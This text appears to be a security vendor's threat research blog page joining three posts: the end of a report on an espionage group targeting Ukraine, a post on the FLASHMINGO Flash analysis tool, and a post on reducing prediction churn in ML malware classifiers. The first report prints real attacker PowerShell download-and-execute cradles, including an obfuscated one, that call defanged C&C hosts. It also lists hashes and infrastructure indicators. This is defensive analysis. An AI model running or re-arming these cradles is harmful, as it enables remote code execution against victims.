This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR's security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors. While this specific group is primarily a threat to Ukraine, nascent threats to Ukraine have previously become international concerns and bear monitoring.

Technical Annex

The LNK file (SPEC-10T-MK2-000-ISS-4.10-09-2018-STANDARD.pdf.lnk [MD5: ec0fb9d17ec77ad05f9a69879327e2f9]) included the following script (Figure 4) to execute a PowerShell script with Base64-encoded script:

vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e
""""aQBlAHgAKABpAHcAcgAgAC0AdQBzAGUAYgAgAGgAdAB0AHAAOgAvAC8AcwBpAG4Ab
wBwAH QAaQBrAC4AdwBlAGIAcwBpAHQAZQAvAEUAdQBjAHoAUwBjACkAIAA="""""", 0 :
window.close")

Figure 4: LNK file script

The following command (Figure 5) was received after decoding the Base64-encoded string:

vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -e iex(iwr -useb
http://sinoptik[.]website/EuczSc)"", 0 : window.close")

Figure 5: LNK file command

The PowerShell script sends a request to URL "http://sinoptik[.]website/EuczSc." Unfortunately, the server was unreachable during analysis.

Network Infrastructure Linked to Attackers

The passive DNS records of the C&C domain "sinoptik[.]website" included the following IPs:

Host/Domain Name	First Seen	IP
sinoptik[.]website	2018-09-17	78.140.167.89
sinoptik[.]website	2018-06-08	78.140.164.221
sinoptik[.]website	2018-03-16	185.125.46.158
www.sinoptik[.]website	2019-01-17	78.140.167.89

Table 2: Network infrastructure linked to attackers

Domains previously connected to RATVERMIN (aka VERMIN) and QUASARRAT (aka QUASAR) also resolved to IP "185.125.46.158" and include the following:

Malware MD5	C&C	Malware Family
47161360b84388d1c254eb68ad3d6dfa	akamainet022[.]info	QUASARRAT
242f0ab53ac5d194af091296517ec10a	notifymail[.]ru	RATVERMIN
07633a79d28bb8b4ef8a6283b881be0e	akamainet066[.]info	QUASARRAT
5feae6cb9915c6378c4bb68740557d0a	akamainet024[.]info	RATVERMIN
dc0ab74129a4be18d823b71a54b0cab0	akamaicdn[.]ru	QUASARRAT
bbcce9c91489eef00b48841015bb36c1	cdnakamai[.]ru	QUASARRAT

Table 3: Additional malware linked to the attackers

RATVERMIN is a .NET backdoor that FireEye Threat Intelligence started tracking in March 2018. It has also been reported in public reports and blog posts.

Operators Highly Aggressive, Proactive

The actor is highly interactive with its tools and has responded within a couple of hours of receiving a new victim, demonstrating its ability to react quickly. An example of this hands-on style of operation occurred during live malware analysis. RATVERMIN operators observed that the malware was running from an unintended target at approximately 1700 GMT (12:00 PM Eastern Standard Time on a weekday) and promptly executed the publicly available Hidden Tear ransomware (saved to disk as hell0.exe, MD5: 8ff9bf73e23ce2c31e65874b34c54eac). The ransomware process was killed before it could execute successfully. If the Hidden Tear continued execution, a file would have been left on the desktop with the following message:

"Files have been encrypted with hidden tear. Send me some bitcoins or kebab. And I also hate night clubs, desserts, being drunk."

When live analysis resumed, the threat group behind the attack started deleting all the analysis tools on the machine. Upon resetting the machine and executing the malware again, this time with a text file open asking why they sent ransomware, the threat group responded by sending the following message via RATVERMIN's C&C domain (Figure 6):

C&C to Victim
HTTP/1.1 200 OK
Content-Length: 5203
Content-Type: multipart/related;
type="application/xop+xml";start="<http://tempuri[.]org/0>";boundary="uuid:67761605-
5c90-47ac-bcd8-
718a09548d60+id=14";start-info="application/soap+xml"
Server: Microsoft-HTTPAPI/2.0
MIME-Version: 1.0
Date: Tue, 20 Mar 2018 19:01:26 GMT
--uuid:67761605-5c90-47ac-bcd8-718a09548d60+id=14
Content-ID: <http://tempuri[.]org/0>
Content-Transfer-Encoding: 8bit
Content-Type: application/xop+xml;charset=utf-8;type="application/soap+xml"

<TRUNCATED>
Mad ?

Figure 6: RATVERMIN's C&C domain message

Related Samples

Further research uncovered additional LNK files with PowerShell scripts that connect to the same C&C server.

Filename: Висновки. S021000262_1901141812000. Scancopy_0003. HP LaserJet Enterprise 700 M775dn(CC522A).docx.lnk (Ukrainian translation: Conclusion)
- MD5: fe198e90813c5ee1cfd95edce5241e25
- Description: LNK file also has the substituted Microsoft Word document icon and sends a request to the same C&C domain
- C&C: http://sinoptik[.]website/OxslV6

PowerShell activity (Command Line Arguments):
vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell.exe -c iex(iwr -useb
http://sinoptik[.]website/OxslV6)"", 0 : window.close")

Figure 7: Additional LNK files with PowerShell scripts

Filename: КМУ база даних.zip (Ukrainian translation: Cabinet of Ministers of Ukraine database)
- MD5: a5300dc3e19f0f0b919de5cda4aeb71c
- Description: ZIP archive containing a malicious LNK file

Filename: Додаток.pdf (Ukrainian translation: Addition)
- MD5: a40fb835a54925aea12ffaa0d76f4ca7
- Description: Benign decoy document

Filename: КМУ_база_даних_органи_упр,_СГ_КМУ.rtf.lnk
- MD5: 4b8aac0649c3a846c24f93dc670bb1ef
- Description: Malicious LNK that executes a PowerShell script
- C&C: http://cdn1186[.]site/zG4roJ

powershell.exe
-NoP -NonI -W hidden -Com "$cx=New-Object -ComObject
MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186[.]site/zG4roJ',$False);$cx.Send();
$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')"
!%SystemRoot%\system32\shell32.dll

Figure 8: Additional LNK files with PowerShell scripts

FireEye Detection

FireEye detection names for the indicators in the attack include the following:

FireEye Endpoint Security	INVOKE CRADLECRAFTER (UTILITY) MALICIOUS SCRIPT CONTENT A (METHODOLOGY) MSHTA.EXE SUSPICIOUS COMMAND LINE SCRIPTING (METHODOLOGY) OFFICE CLIENT SUSPICIOUS CHILD PROCESS (METHODOLOGY) PERSISTENT MSHTA.EXE PROCESS EXECUTION (METHODOLOGY) POWERSHELL.EXE EXECUTION ARGUMENT OBFUSCATION (METHODOLOGY) POWERSHELL.EXE IEX ENCODED COMMAND (METHODOLOGY) SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
FireEye Network Security	86300142_Backdoor.Win.QUASARRAT 86300140_Backdoor.Win.QUASARRAT 86300141_Backdoor.Win.QUASARRAT Malware.archive FE_Backdoor_MSIL_RATVERMIN_1 33340392_Backdoor.Win.RATVERMIN 33340391_Backdoor.Win.RATVERMIN
FireEye Email Security	FE_MSIL_Crypter FE_Backdoor_MSIL_RATVERMIN_1 Malware.Binary.lnk Malware.Binary.exe Malware.archive Backdoor.Win.QUASARRAT Backdoor.Win.RATVERMIN CustomPolicy.MVX.exe CustomPolicy.MVX.65003.ExecutableDeliveredByEmail

Summary of Indicators

Malicious package and LNK files

982565e80981ce13c48e0147fb271fe5
e92d01d9b1a783a23477e182914b2454
ec0fb9d17ec77ad05f9a69879327e2f9
fe198e90813c5ee1cfd95edce5241e25
a5300dc3e19f0f0b919de5cda4aeb71c
4b8aac0649c3a846c24f93dc670bb1ef

Related File

0d6a46eb0d0148aafb34e287fcafa68f (decoy document)
bace12f3be3d825c6339247f4bd73115 (decoy document)
a40fb835a54925aea12ffaa0d76f4ca7 (decoy document)

Quasar RAT Samples

50b1f0391995a0ce5c2d937e880b93ee
47161360b84388d1c254eb68ad3d6dfa
07633a79d28bb8b4ef8a6283b881be0e
dc0ab74129a4be18d823b71a54b0cab0
bbcce9c91489eef00b48841015bb36c1
3ddc543facdc43dc5b1bdfa110fcffa3
5b5060ebb405140f87a1bb65e06c9e29
80b3d1c12fb6aaedc59ce4323b0850fe
d2c6e6b0fbe37685ddb865cf6b523d8c
dc0ab74129a4be18d823b71a54b0cab0
dca799ab332b1d6b599d909e17d2574c

RATVERMIN

242f0ab53ac5d194af091296517ec10a
5feae6cb9915c6378c4bb68740557d0a
5e974179f8ef661a64d8351e6df53104
0b85887358fb335ad0dd7ccbc2d64bb4
9f88187d774cc9eaf89dc65479c4302d
632d08020499a6b5ee4852ecadc79f2e
47cfac75d2158bf513bcd1ed5e3dd58c
8d8a84790c774adf4c677d2238999eb5
860b8735995df9e2de2126d3b8978dbf
987826a19f7789912015bb2e9297f38b
a012aa7f0863afbb7947b47bbaba642e
a6ecfb897ca270dd3516992386349123
7e2f581f61b9c7c71518fea601d3eeb3
b5a6aef6286dd4222c74257d2f44c4a5
0f34508772ac35b9ca8120173c14d5f0 (RATVERMIN's keylogger)
86d2493a14376fbc007a55295ef93500 (RATVERMIN's encryption tool)
04f1aa35525a44dcaf51d8790d1ca8a0 (RATVERMIN helper functions)
634d2a8181d08d5233ca696bb5a9070d (RATVERMIN helper functions)
d20ec4fdfc7bbf5356b0646e855eb250 (RATVERMIN helper functions)
5ba785aeb20218ec89175f8aaf2e5809 (RATVERMIN helper functions)
b2cf610ba67edabb62ef956b5e177d3a (RATVERMIN helper functions)
7e30836458eaad48bf57dc1decc27d09 (RATVERMIN helper functions)
df3e16f200eceeade184d6310a24c3f4 (RATVERMIN crypt functions)
86d2493a14376fbc007a55295ef93500 (RATVERMIN crypt functions)
d72448fd432f945bbccc39633757f254 (RATVERMIN task scheduler tool)
e8e954e4b01e93f10cefd57fce76de25 (RATVERMIN task scheduler tool)

Hidden Tear Ransomware

8ff9bf73e23ce2c31e65874b34c54eac

Malicious Infrastructure

akamainet022[.]info
akamainet066[.]info
akamainet024[.]info
akamainet023[.]info
akamainet066[.]info
akamainet021[.]info
www.akamainet066[.]info
www.akamainet023[.]info
www.akamainet022[.]info
www.akamainet021[.]info
akamaicdn[.]ru
cdnakamai[.]ru
mailukr[.]net
notifymail[.]ru
www.notifymail[.]ru
tech-adobe.dyndns[.]biz
sinoptik[.]website
cdn1186[.]site
news24ua[.]info
http://sinoptik[.]website/EuczSc
http://sinoptik[.]website/OxslV6
http://cdn1186[.]site/zG4roJ
206.54.179.196
195.78.105.23
185.125.46.24
185.158.153.222
188.227.16.73
212.116.121.46
185.125.46.158
94.158.46.251
188.227.75.189

Correlated Infrastructure

78.140.167.89 (pdns)
1ua[.]eu (pdns)
24ua[.]website (pdns, registered by [email protected])
cdn1214[.]site (pdns)
censor[.]website (pdns, registered by [email protected])
fakty[.]website (pdns, registered by [email protected])
gismeteo[.]website (pdns, registered by [email protected])
lmeta[.]eu (pdns)
me.co[.]ua (pdns, registered by [email protected])
milnews[.]info (pdns)
mj2[.]pw (pdns, registered by [email protected])
novaposhta[.]website (pdns, registered by [email protected])
olx[.]website (pdns, registered by [email protected])
www.olx[.]website (pdns, registered by [email protected])
onlineua[.]website (pdns, registered by [email protected])
r2a[.]pw (pdns, registered by [email protected])
rarnbier[.]ru (pdns)
rbc[.]website (pdns)
rst[.]website (pdns, registered by [email protected])
satv[.]pw (pdns, registered by [email protected])
slaviasoft[.]website (pdns, registered by [email protected])
tv.co[.]ua (pdns, registered by [email protected])
uatoday[.]website (pdns, registered by [email protected])
ukrnews[.]website (pdns, registered by [email protected])
www.ukrnews[.]website (pdns, registered by [email protected])
ukrposhta[.]website (pdns, registered by [email protected])
unian[.]pw (pdns)
vj2[.]pw (pdns, registered by [email protected])
windowsupdate.kiev[.]ua (pdns)
xn--90adzbis.xn--c1avg (registered by [email protected])
z1k[.]pw (pdns, registered by [email protected])
188.164.251.61 (pdns)
188.227.17.68 (pdns)
206.54.179.160 (pdns of many malicious domains)
208.69.116.100 (pdns)
208.69.116.144 (pdns)
5.200.53.181 (pdns)
78.140.162.22 (pdns)
78.140.167.137 (pdns)
88.85.86.229 (pdns)
88.85.95.72 (pdns)
94.158.34.2 (pdns)
94.158.47.228 (pdns)

FLASHMINGO: The FireEye Open Source Automatic Analysis Tool for Flash

Threat Research

Carlos Garcia Prado

15 April 2019 at 15:00

Adobe Flash is one of the most exploited software components of the last decade. Its complexity and ubiquity make it an obvious target for attackers. Public sources list more than one thousand CVEs being assigned to the Flash Player alone since 2005. Almost nine hundred of these vulnerabilities have a Common Vulnerability Scoring System (CVSS) score of nine or higher.

After more than a decade of playing cat and mouse with the attackers, Adobe is finally deprecating Flash in 2020. To the security community this move is not a surprise since all major browsers have already dropped support for Flash.

A common misconception exists that Flash is already a thing of the past; however, history has shown us that legacy technologies linger for quite a long time. If organizations do not phase Flash out in time, the security threat may grow beyond Flash's end of life due to a lack of security patches.

As malware analysts on the FLARE team, we still see Flash exploits within malware samples. We must find a compromise between the need to analyse Flash samples and the correct amount of resources to be spent on a declining product. To this end we developed FLASHMINGO, a framework to automate the analysis of SWF files. FLASHMINGO enables analysts to triage suspicious Flash samples and investigate them further with minimal effort. It integrates into various analysis workflows as a stand-alone application or can be used as a powerful library. Users can easily extend the tool's functionality via custom Python plug-ins.

Background: SWF and ActionScript3

Before we dive into the inner workings of FLASHMINGO, let’s learn about the Flash architecture. Flash’s SWF files are composed of chunks, called tags, implementing a specific functionality. Tags are completely independent from each other, allowing for compatibility with older versions of Flash. If a tag is not supported, the software simply ignores it. The main source of security issues revolves around SWF’s scripting language: ActionScript3 (AS3). This scripting language is compiled into bytecode and placed within a Do ActionScript ByteCode (DoABC) tag. If a SWF file contains a DoABC tag, the bytecode is extracted and executed by a proprietary stack-based virtual machine (VM), known as AVM2 in the case of AS3, shipped within Adobe’s Flash player. The design of the AVM2 was based on the Java VM and was similarly plagued by memory corruption and logical issues that allowed malicious AS3 bytecode to execute native code in the context of the Flash player. In the few cases where the root cause of past vulnerabilities was not in the AVM2, ActionScript code was still necessary to put the system in a state suitable for reliable exploitation. For example, by grooming the heap before triggering a memory corruption. For these reasons, FLASHMINGO focuses on the analysis of AS3 bytecode.

Tool Architecture

FLASHMINGO leverages the open source SWIFFAS library to do the heavy lifting of parsing Flash files. All binary data and bytecode are parsed and stored in a large object named SWFObject. This object contains all the information about the SWF relevant to our analysis: a list of tags, information about all methods, strings, constants and embedded binary data, to name a few. It is essentially a representation of the SWF file in an easily queryable format.

FLASHMINGO is a collection of plug-ins that operate on the SWFObject and extract interesting information. Figure 1 shows the relationship between FLASHMINGO, its plug-ins, and the SWFObject.

Figure 1: High level software structure

Several useful plug-ins covering a wide range of common analysis are already included with FLASHMINGO, including:

Find suspicious method names. Many samples contain method names used during development, like “run_shell” or “find_virtualprotect”. This plug-in flags samples with methods containing suspicious substrings.
Find suspicious constants. The presence of certain constant values in the bytecode may point to malicious or suspicious code. For example, code containing the constant value 0x5A4D may be shellcode searching for an MZ header.
Find suspicious loops. Malicious activity often happens within loops. This includes encoding, decoding, and heap spraying. This plug-in flags methods containing loops with interesting operations such as XOR or bitwise AND. It is a simple heuristic that effectively detects most encoding and decoding operations, and otherwise interesting code to further analyse.
Retrieve all embedded binary data.
A decompiler plug-in that uses the FFDEC Flash Decompiler. This decompiler engine, written in Java, can be used as a stand-alone library. Since FLASHMINGO is written in Python, using this plug-in requires Jython to interoperate between these two languages.

Extending FLASHMINGO With Your Own Plug-ins

FLASHMINGO is very easy to extend. Every plug-in is located in its own directory under the plug-ins directory. At start-up FLASHMINGO searches all plug-in directories for a manifest file (explained later in the post) and registers the plug-in if it is marked as active.

To accelerate development a template plug-in is provided. To add your own plug-in, copy the template directory, rename it, and edit its manifest and code. The template plug-in’s manifest, written in YAML, is shown below:

```
# This is a template for easy development
name: Template
active: no
description: copy this to kickstart development
returns: nothing

```

The most important parameters in this file are: name and active. The name parameter is used internally by FLASHMINGO to refer to it. The active parameter is a Boolean value (yes or no) indicating whether this plug-in should be active or not. By default, all plug-ins (except the template) are active, but there may be cases where a user would want to deactivate a plug-in. The parameters description and returns are simple strings to display documentation to the user. Finally, plug-in manifests are parsed once at program start. Adding new plug-ins or enabling/disabling plug-ins requires restarting FLASHMINGO.

Now for the actual code implementing the business logic. The file plugin.py contains a class named Plugin; the only thing that is needed is to implement its run method. Each plug-in receives an instance of a SWFObject as a parameter. The code will interact with this object and return data in a custom format, defined by the user. This way, the user's plug-ins can be written to produce data that can be directly ingested by their infrastructure.

Let's see how easy it is to create plug-ins by walking through one that is included, named binary_data. This plugin returns all embedded data in a SWF file by default. If the user specifies an optional parameter pattern then the plug-in searches for matches of that byte sequence within the embedded data, returning a dictionary of embedded data and the offset at which the pattern was found.

First, we define the optional argument pattern to be supplied by the user (line 2 and line 4):

Afterwards, implement a custom run method and all other code needed to support it:

This is a simple but useful plugin and illustrates how to interact with FLASHMINGO. The plug-in has a logging facility accessible through the property “ml” (line 2). By default it logs to FLASHMINGO’s main logger. If unspecified, it falls back to a log file within the plug-in’s directory. Line 10 to line 16 show the custom run method, extracting information from the SWF’s embedded data with the help of the custom _inspect_binary_data method. Note the source of this binary data: it is being read from a property named “swf”. This is the SWFObject passed to the plug-in as an argument, as mentioned previously. More complex analysis can be performed on the SWF file contents interacting with this swf object. Our repository contains documentation for all available methods of a SWFObject.

Conclusion

Even though Flash is set to reach its end of life at the end of 2020 and most of the development community has moved away from it a long time ago, we predict that we’ll see Flash being used as an infection vector for a while. Legacy technologies are juicy targets for attackers due to the lack of security updates. FLASHMINGO provides malware analysts a flexible framework to quickly deal with these pesky Flash samples without getting bogged down in the intricacies of the execution environment and file format.

Find the FLASHMINGO tool on the FireEye public GitHub Repository.

Churning Out Machine Learning Models: Handling Changes in Model Predictions

Threat Research

David Krisiloff

9 April 2019 at 17:00

Introduction

Machine learning (ML) is playing an increasingly important role in cyber security. Here at FireEye, we employ ML for a variety of tasks such as: antivirus, malicious PowerShell detection, and correlating threat actor behavior. While many people think that a data scientist’s job is finished when a model is built, the truth is that cyber threats constantly change and so must our models. The initial training is only the start of the process and ML model maintenance creates a large amount of technical debt. Google provides a helpful introduction to this topic in their paper “Machine Learning: The High-Interest Credit Card of Technical Debt.” A key concept from the paper is the principle of CACE: change anything, change everything. Because ML models deliberately find nonlinear dependencies between input data, small changes in our data can create cascading effects on model accuracy and downstream systems that consume those model predictions. This creates an inherent conflict in cyber security modeling: (1) we need to update models over time to adjust to current threats and (2) changing models can lead to unpredictable outcomes that we need to mitigate.

Ideally, when we update a model, the only change in model outputs are improvements, e.g. fixes to previous errors. Both false negatives (missing malicious activity) and false positives (alerts on benign activity), have significant impact and should be minimized. Since no ML model is perfect, we mitigate mistakes with orthogonal approaches: whitelists and blacklists, external intelligence feeds, rule-based systems, etc. Combining with other information also provides context for alerts that may not otherwise be present. However, CACE! These integrated systems can suffer unintended side effects from a model update. Even when the overall model accuracy has increased, individual changes in model output are not guaranteed to be improvements. Introduction of new false negatives or false positives in an updated model, called churn, creates the potential for new vulnerabilities and negative interactions with cyber security infrastructure that consumes model output. In this article, we discuss churn, how it creates technical debt when considering the larger cyber security product, and methods to reduce it.

Prediction Churn

Whenever we retrain our cyber security-focused ML models, we need to able to calculate and control for churn. Formally, prediction churn is defined as the expected percent difference between two different model predictions (note that prediction churn is not the same as customer churn, the loss of customers over time, which is the more common usage of the term in business analytics). It was originally defined by Cormier et al. for a variety of applications. For cyber security applications, we are often concerned with just those differences where the newer model performs worse than the older model. Let’s define bad churn when retraining a classifier as the percentage of misclassified samples in the test set which the original model correctly classified.

Churn is often a surprising and non-intuitive concept. After all, if the accuracy of our new model is better than the accuracy of our old model, what’s the problem? Consider the simple linear classification problem of malicious red squares and benign blue circles in Figure 1. The original model, A, makes three misclassifications while the newer model, B, makes only two errors. B is the more accurate model. Note, however, that B introduces a new mistake in the lower right corner, misclassifying a red square as benign. That square was correctly classified by model A and represents an instance of bad churn. Clearly, it’s possible to reduce the overall error rate while introducing a small number of new errors which did not exist in the older model.

Figure 1: Two linear classifiers with errors highlighted in orange. The original classifier A has lower accuracy than B. However, B introduces a new error in the bottom right corner.

Practically, churn introduces two problems in our models. First, bad churn may require changes to whitelist/blacklists used in conjunction with ML models. As we previously discussed, these are used to handle the small but inevitable number of incorrect classifications. Testing on large repositories of data is necessary to catch such changes and update associated whitelists and blacklists. Second, churn may create issues for other ML models or rule-based systems which rely on the output of the ML model. For example, consider a hypothetical system which evaluates URLs using both a ML model and a noisy blacklist. The system generates an alert if

P(URL = ‘malicious’) > 0.9 or
P(URL = ‘malicious’) > 0.5 and the URL is on the blacklist

After retraining, the distribution of P(URL=‘malicious’) changes and all .com domains receive a higher score. The alert rules may need to be readjusted to maintain the required overall accuracy of the combined system. Ultimately, finding ways of reducing churn minimizes this kind of technical debt.

Experimental Setup

We’re going to explore churn and churn reduction techniques using EMBER, an open source malware classification data set. It consists of 1.1 million PE files first seen in 2017, along with their labels and features. The objective is to classify the files as either goodware or malware. For our purposes we need to construct not one model, but two, in order to calculate the churn between models. We have split the data set into three pieces:

January through August is used as training data
September and October are used to simulate running the model in production and retraining (test 1 in Figure 2).
November and December are used to evaluate the models from step 1 and 2 (test 2 in Figure 2).

Figure 2: A comparison of our experimental setup versus the original EMBER data split. EMBER has a ten-month training set and a two-month test set. Our setup splits the data into three sets to simulate model training, then retraining while keeping an independent data set for final evaluation.

Figure 2 shows our data split and how it compares to the original EMBER data split. We have built a LightGBM classifier on the training data, which we’ll refer to as the baseline model. To simulate production testing, we run the baseline model on test 1 and record the FPs and FNs. Then, we retrain our model using both the training data and the FPs/FNs from test 1. We’ll refer to this model as the standard retrain. This is a reasonably realistic simulation of actual production data collection and model retraining. Finally, both the baseline model and the standard retrain are evaluated on test 2. The standard retrain has a higher accuracy than the baseline on test 2, 99.33% vs 99.10% respectively. However, there are 246 misclassifications made by the retrain model that were not made by the baseline or 0.12% bad churn.

Incremental Learning

Since our rationale for retraining is that cyber security threats change over time, e.g. concept drift, it’s a natural suggestion to use techniques like incremental learning to handle retraining. In incremental learning we take new data to learn new concepts without forgetting (all) previously learned concepts. That also suggests that an incrementally trained model may not have as much churn, as the concepts learned in the baseline model still exist in the new model. Not all ML models support incremental learning, but linear and logistic regression, neural networks, and some decision trees do. Other ML models can be modified to implement incremental learning. For our experiment, we incrementally trained the baseline LightGBM model by augmenting the training data with FPs and FNs from test 1 and then trained an additional 100 trees on top of the baseline model (for a total of 1,100 trees). Unlike the baseline model we use regularization (L2 parameter of 1.0); using no regularization resulted in overfitting to the new points. The incremental model has a bad churn of 0.05% (113 samples total) and 99.34% accuracy on test 2. Another interesting metric is the model’s performance on the new training data; how many of the baseline FPs and FNs from test 1 does the new model fix? The incrementally trained model correctly classifies 84% of the previous incorrect classifications. In a very broad sense, incrementally training on a previous model’s mistake provides a “patch” for the “bugs” of the old model.

Churn-Aware Learning

Incremental approaches only work if the features of the original and new model are identical. If new features are added, say to improve model accuracy, then alternative methods are required. If what we desire is both accuracy and low churn, then the most straightforward solution is to include both of these requirements when training. That’s the approach taken by Cormier et al., where samples received different weights during training in such a way as to minimize churn. We have made a few deviations in our approach: (1) we are interested in reducing bad churn (churn involving new misclassifications) as opposed to all churn and (2) we would like to avoid the extreme memory requirements of the original method. In a similar manner to Cormier et al., we want to reduce the weight, e.g. importance, of previously misclassified samples during training of a new model. Practically, the model sees making the same mistakes as the previous model as cheaper than making a new mistake. Our weighing scheme gives all samples correctly classified by the original model a weight of one and all other samples have a weight of: w = α – β |0.5 – P_old(χ_i)|, where P_old(χ_i) is the output of the old model on sample χ_i and α, β are adjustable hyperparameters. We train this reduced churn operator model (RCOP) using an α of 0.9, a β of 0.6 and the same training data as the incremental model. RCOP produces 0.09% bad churn, 99.38% accuracy on test 2.

Results

Figure 3 shows both accuracy and bad churn of each model on test set 2. We compare the baseline model, the standard model retrain, the incrementally learned model and the RCOP model.

Figure 3: Bad churn versus accuracy on test set 2.

Table 1 summarizes each of these approaches, discussed in detail above.

Name	Trained on	Method	Total # of trees
Baseline	train	LightGBM	1000
Standard retrain	train + FPs/FNs from baseline on test 1	LightGBM	1100
Incremental model	train + FPs/FNs from baseline on test 1	Trained 100 new trees, starting from the baseline model	1100
RCOP	train + FPs/FNs from baseline on test 1	LightGBM with altered sample weights	1100

Table 1: A description of the models tested

The baseline model has 100 fewer trees than the other models, which could explain the comparatively reduced accuracy. However, we tried increasing the number of trees which resulted in only a minor increase in accuracy of < 0.001%. The increase in accuracy for the non-baseline methods is due to the differences in data set and training methods. Both incremental training and RCOP work as expected producing less churn than the standard retrain, while showing accuracy improvements over the baseline. In general, there is usually a trend of increasing accuracy being correlated with increasing bad churn: there is no free lunch. That increasing accuracy occurs due to changes in the decision boundary, the more improvement the more changes occur. It seems reasonable the increasing decision boundary changes correlate with an increase in bad churn although we see no theoretical justification for why that must always be the case.

Unexpectedly, both the incremental model and RCOP produce more accurate models with less churn than the standard retrain. We would have assumed that given their additional constraints both models would have less accuracy with less churn. The most direct comparison is RCOP versus the standard retrain. Both models use identical data sets and model parameters, varying only by the weights associated with each sample. RCOP reduces the weight of incorrectly classified samples by the baseline model. That reduction is responsible for the improvement in accuracy. A possible explanation of this behavior is mislabeled training data. Multiple authors have suggested identifying and removing points with label noise, often using the misclassifications of a previously trained model to identify those noisy points. Our scheme, which reduces the weight of those points instead of removing them, is not dissimilar to those other noise reduction approaches which could explain the accuracy improvement.

Conclusion

ML models experience an inherent struggle: not retraining means being vulnerable to new classes of threats, while retraining causes churn and potentially reintroduces old vulnerabilities. In this blog post, we have discussed two different approaches to modifying ML model training in order to reduce churn: incremental model training and churn-aware learning. Both demonstrate effectiveness in the EMBER malware classification data set by reducing the bad churn, while simultaneously improving accuracy. Finally, we also demonstrated the novel conclusion that reducing churn in a data set with label noise can result in a more accurate model. Overall, these approaches provide low technical debt solutions to updating models that allow data scientists and machine learning engineers to keep their models up-to-date against the latest cyber threats at minimal cost. At FireEye, our data scientists work closely with the FireEye Labs detection analysts to quickly identify misclassifications and use these techniques to reduce the impact of churn on our customers.